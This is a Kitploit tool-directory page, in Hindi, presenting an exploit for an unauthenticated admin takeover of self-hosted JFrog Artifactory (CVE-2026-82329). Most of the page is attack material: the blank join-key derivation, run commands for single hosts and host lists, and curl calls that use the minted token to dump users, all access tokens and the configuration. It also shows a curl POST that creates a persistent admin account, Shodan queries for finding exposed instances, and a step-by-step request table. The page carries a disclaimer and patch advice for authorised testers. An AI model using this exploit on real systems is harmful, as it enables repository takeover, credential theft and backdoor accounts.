Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-82329-JFrog-Artifactory-Auth-Bypass — CVE-2026-82329 के लिए एक्सप्लॉइट, सेल्फ-होस्टेड JFrog Artifactory में एक अनऑथेंटिकेटेड ऑथ बायपास, जो ब्लैंक जॉइन की के माध्यम से एडमिन टोकन टेकओवर की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/ynsmroztas/cve-2026-82329-jfrog-artifactory-auth-bypass
प्रमाणीकरण और प्राधिकरणभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubynsmroztas/cve-2026-82329-jfrog-artifactory-auth-bypass

CVE-2026-82329-JFrog-Artifactory-Auth-Bypass

CVE-2026-82329 के लिए एक्सप्लॉइट, सेल्फ-होस्टेड JFrog Artifactory में एक अनऑथेंटिकेटेड ऑथ बायपास, जो ब्लैंक जॉइन की के माध्यम से एडमिन टोकन टेकओवर की अनुमति देता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
18घं 50मि पहलेअभी तक समीक्षित नहीं

artifactory.py

artifactory.py — CVE-2026-82329 unauth admin takeover

root@kitploit:~
╔══════════════════════════════════════════════════════════╗
║  artifactory  ·  CVE-2026-82329 unauth admin takeover    ║
║  mitsec       ·  https://x.com/ynsmroztas                ║
╚══════════════════════════════════════════════════════════╝

CVE-2026-82329 — JFrog Artifactory (स्व-होस्टेड) बिना प्रमाणीकरण के join-JWT
→ SERVICE admin टोकन → प्लेटफ़ॉर्म applied-permissions/admin एक्सेस टोकन।

CVSS 9.8 · CWE-287 · CISA KEV · जंगल में शोषित।

केवल अधिकृत परीक्षण। इसे उन सिस्टमों पर न चलाएं जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है।


यह क्या करता है

डिफ़ॉल्ट स्व-होस्टेड इंस्टॉल एक खाली join key पर भरोसा करते हैं।

root@kitploit:~
JoinKeyUtils.getSigningKey("")  ==  pkcs7(empty, 32)  ==  32 × 0x20
kid = SHA256("") = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

क्लाउड-होस्टेड JFrog पैच किया गया है। केवल स्व-होस्टेड।

Access फिक्स लाइन: 7.191.14।


इंस्टॉल

root@kitploit:~
# केवल stdlib — कोई pip नहीं
python3 artifactory.py -h

TLS सत्यापन डिफ़ॉल्ट रूप से बंद है (स्व-हस्ताक्षरित Artifactory सामान्य है)।
कोई अतिरिक्त फ्लैग नहीं।


उपयोग

root@kitploit:~
# एकल होस्ट
python3 artifactory.py -u https://artifactory.example.internal:8082

# मिंटेड एडमिन टोकन प्रिंट करें
python3 artifactory.py -u https://TARGET:8082 --token

# सूची / पाइपलाइन (httpx, shodan, subfinder शैली)
python3 artifactory.py -l hosts.txt --threads 8
cat hosts.txt | python3 artifactory.py

# Pro / Enterprise केवल — स्थानीय एडमिन बनाए रखें (विनाशकारी)
python3 artifactory.py -u https://TARGET:8082 --create-admin auditor:ChangeMe_1

आउटपुट

root@kitploit:~
[VULN]  https://TARGET:8082  join=201 svc_scp=admin admin token scp=applied-permissions/admin aud=* config=200/42020b tokens=200 version=7.161.19
[SAFE]  https://patched:8082  join HTTP 401  (patched / no blank key)
[FAIL]  https://dead:8082     unreachable
टैगअर्थ

--token Bearer मान प्रिंट करता है। यही अधिग्रहण है — लॉगिन उपयोगकर्ता वैकल्पिक है।

--create-admin अक्सर OSS पर 400 लौटाता है (PUT /artifactory/api/security/users Pro है)।
एडमिन टोकन फिर भी काम करता है। वैध निष्कर्ष के लिए स्थायित्व आवश्यक नहीं है।


हिट के बाद — टोकन का उपयोग करें

TARGET बदलें और --token से टोकन पेस्ट करें।

root@kitploit:~
TOKEN='eyJ...'          # --token का आउटपुट
B='https://TARGET:8082'

# संस्करण / संस्करण
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/system/version"

# उपयोगकर्ता निर्देशिका (एडमिन)
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v2/users"

# इंस्टेंस पर हर एक्सेस टोकन
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v1/tokens" | head -c 400

# रिपॉजिटरी इन्वेंट्री
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/repositories"

अन्य उपयोगी केवल-एडमिन रीड (जब तक अधिकृत न हों लिखें नहीं):

root@kitploit:~
curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/system/configuration" -o config.xml

curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/artifactory/api/security/users"

curl -sk -H "Authorization: Bearer $TOKEN" \
  "$B/access/api/v1/tokens"

UI: प्लेटफ़ॉर्म → Access Token से लॉगिन करें, या हर अनुरोध पर
Authorization: Bearer <token> भेजें।

वैकल्पिक स्थायी उपयोगकर्ता (Pro / Access v2)

root@kitploit:~
curl -sk -D- -X POST "$B/access/api/v2/users" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"auditor","email":"[email protected]","password":"ChangeMe_1Aa","admin":true}'

पासवर्ड नीति 400 ≠ असुरक्षित नहीं। टोकन में पहले से aud=* है।


टोही

root@kitploit:~
# Shodan
http.component:"Artifactory" port:8081,8082
title:"Artifactory" "JFrog"
http.html:"/artifactory/webapp"
ssl.cert.subject.CN:"artifactory"

# सामान्य पोर्ट
8081  8082  8040  8046  443

टूल -u से /artifactory /ui /webapp हटाता है और उसी ओरिजिन पर Access राउटर से बात करता है।


--create-admin निष्कर्ष क्यों नहीं है

प्रभाव रिपोर्ट करें: बिना प्रमाणीकरण के प्लेटफ़ॉर्म एडमिनिस्ट्रेटर टोकन।
उपयोगकर्ता निर्माण एक अनुवर्ती है, मूल समस्या नहीं।


संदर्भ

  • NVD — CVE-2026-82329
  • JFrog सुरक्षा सलाह
  • स्व-प्रबंधित रिलीज़ / पैच
  • लैब + पैच अंतर: dinosn/cve-2026-82329-jfrog-artifactory

अस्वीकरण

यह रिपॉजिटरी उन सिस्टमों के लिए एक वैलिडेटर है जिनका परीक्षण करने के लिए आप अधिकृत हैं।
तीसरे पक्ष के इंफ्रास्ट्रक्चर पर बिना अनुमति के टोकन मिंट करना, उपयोगकर्ताओं को सूचीबद्ध करना, या खाते बनाना अवैध है।

पैच: अपनी शाखा के लिए फिक्स्ड बिल्ड में अपग्रेड करें, एक वास्तविक join key सेट करें, प्रकटीकरण के बाद मिंटेड टोकन घुमाएं।


mitsec · @ynsmroztas

टूल डाउनलोड करें
चरणअनुरोधपरिणाम
1HS256 join JWT बनाएं (iat ताज़ा, skip_node_registration=true)ज्ञात HMAC गुप्त कुंजी
2POST /access/api/v1/registry/join201 SERVICE टोकन scp=admin
3POST /access/api/v1/tokens200 एडमिन टोकन scp=applied-permissions/admin aud=*
4GET /artifactory/api/system/configurationकेवल-एडमिन प्रमाण (unauth = 401)
शाखाअसुरक्षित ≤पैच किया गया
7.1117.111.207.111.21
7.1177.117.277.117.28
7.1257.125.197.125.20
7.1337.133.287.133.29
7.1467.146.377.146.38
7.1617.161.197.161.20
VULNखाली join स्वीकृत + एडमिन प्रमाण (configuration या टोकन सूची = 200)
SAFEjoin अस्वीकृत — पैच किया गया, अतिरिक्त join keys सेट, या Access नहीं
INFOjoin मिंटेड, प्रमाण एंडपॉइंट 200 नहीं — मैन्युअल रूप से जांचें
FAILनेटवर्क / टाइमआउट
सतहOSSPro / Enterprise
एडमिन एक्सेस टोकन मिंट करेंहाँहाँ
कॉन्फ़िग / टोकन सूची / रेपो पढ़ेंहाँहाँ
PUT /artifactory/api/security/users400 केवल-Pro200/201
POST /access/api/v2/usersसंस्करण / नीति पर निर्भर201